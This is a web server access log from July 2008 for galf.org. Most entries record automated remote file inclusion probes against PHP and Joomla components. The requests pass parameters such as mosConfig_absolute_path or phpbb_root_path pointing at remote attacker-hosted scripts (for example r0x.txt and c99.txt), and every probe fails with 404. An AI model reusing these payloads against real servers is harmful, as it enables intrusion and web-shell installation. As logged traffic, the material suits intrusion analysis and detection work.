194.186.45.242 - - [20/Jul/2008:17:29:39 -0700] "GET /logs/access_080609.log///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.73.149 - - [20/Jul/2008:17:29:39 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:29:39 -0700] "GET ///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.73.149 - - [20/Jul/2008:17:29:39 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.73.149 - - [20/Jul/2008:17:29:39 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:29:39 -0700] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.199.218.32 - - [20/Jul/2008:17:29:46 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.199.218.32 - - [20/Jul/2008:17:29:46 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.199.218.32 - - [20/Jul/2008:17:29:47 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:30:29 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
80.67.25.19 - - [20/Jul/2008:17:30:36 -0700] "GET /logs/access_070910.log/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.25.19 - - [20/Jul/2008:17:30:36 -0700] "GET /modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.25.19 - - [20/Jul/2008:17:30:36 -0700] "GET /logs/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:31:11 -0700] "GET /logs/index.php?url=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:31:11 -0700] "GET /logs/index.php?url=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:31:11 -0700] "GET /index.php?url=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:31:12 -0700] "GET /index.php?url=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
80.67.25.19 - - [20/Jul/2008:17:31:16 -0700] "GET /logs/access_070924.log/modules/xfsection//modify.php?dir_module=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:32:43 -0700] "GET /logs/access_080310.log///components/com_forum/download.php?phpbb_root_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:32:43 -0700] "GET ///components/com_forum/download.php?phpbb_root_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:32:44 -0700] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:32:58 -0700] "GET /logs/access_080609.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:32:59 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:32:59 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:33:21 -0700] "GET /logs/access_071029.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:33:59 -0700] "GET /logs/access_071119.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:33:59 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:33:59 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
88.208.205.52 - - [20/Jul/2008:17:34:24 -0700] "GET /errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
88.208.205.52 - - [20/Jul/2008:17:34:31 -0700] "GET /errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
88.208.205.52 - - [20/Jul/2008:17:34:31 -0700] "GET /logs/errors.php?error=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:34:50 -0700] "GET /logs/access_080310.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:34:50 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:34:51 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.75.72.121 - - [20/Jul/2008:17:34:58 -0700] "GET /logs/access_080609.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.74.194 - - [20/Jul/2008:17:34:59 -0700] "GET /logs/access_071119.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.19.74.194 - - [20/Jul/2008:17:34:59 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.19.74.194 - - [20/Jul/2008:17:34:59 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:35:06 -0700] "GET /logs/access_080113.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:36:44 -0700] "GET /logs/access_070826.log///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:36:45 -0700] "GET ///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:36:45 -0700] "GET /logs///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.74.194 - - [20/Jul/2008:17:37:12 -0700] "GET /logs/access_080204.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.19.74.194 - - [20/Jul/2008:17:37:12 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
64.8.105.21 - - [20/Jul/2008:17:37:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [20/Jul/2008:17:37:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:37:21 -0700] "GET /logs/access_070827.log///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:37:51 -0700] "GET /logs///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:37:52 -0700] "GET ///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:37:53 -0700] "GET /%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:37:53 -0700] "GET /logs/%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:38:05 -0700] "GET /logs/access_080630.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:38:05 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:38:06 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:38:22 -0700] "GET /logs/access_080310.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:38:22 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:38:23 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:40 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:41 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:41 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:41 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:45 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:38:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
64.8.105.21 - - [20/Jul/2008:17:38:50 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:38:54 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:05 -0700] "GET /logs/access_071029.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:07 -0700] "GET /logs/access_080630.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:08 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:08 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [20/Jul/2008:17:39:13 -0700] "GET /includes/get_header.php?vwar_root=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
195.5.163.212 - - [20/Jul/2008:17:39:14 -0700] "GET /logs/includes/get_header.php?vwar_root=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
217.198.149.178 - - [20/Jul/2008:17:39:16 -0700] "GET /logs/access_080113.log/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:39:16 -0700] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:20 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:21 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:39:48 -0700] "GET /announcements.php?phpraid_dir=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:39:48 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:52 -0700] "GET /logs/access_080310.log///components/com_forum/download.php?phpbb_root_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:52 -0700] "GET ///components/com_forum/download.php?phpbb_root_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:39:53 -0700] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:40:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:40:23 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:40:26 -0700] "GET /logs/access_080204.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:40:26 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:40:26 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
70.86.134.34 - - [20/Jul/2008:17:40:34 -0700] "GET /logs/access_070924.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:40:38 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
216.246.31.225 - - [20/Jul/2008:17:40:38 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
216.246.31.225 - - [20/Jul/2008:17:40:38 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
218.38.12.93 - - [20/Jul/2008:17:41:14 -0700] "GET /logs/access_071112.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:41:51 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:41:51 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
74.6.18.253 - - [20/Jul/2008:17:41:59 -0700] "GET /?M=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:42:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
216.104.34.70 - - [20/Jul/2008:17:42:40 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:42:51 -0700] "GET //main.php?sayfa=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:17:42:51 -0700] "GET /logs//main.php?sayfa=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
196.36.153.10 - - [20/Jul/2008:17:42:59 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
196.36.153.10 - - [20/Jul/2008:17:42:59 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
200.29.4.54 - - [20/Jul/2008:17:43:01 -0700] "GET /logs/access_080428.log//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.244.11.20 - - [20/Jul/2008:17:43:03 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.153.58 - - [20/Jul/2008:17:43:08 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
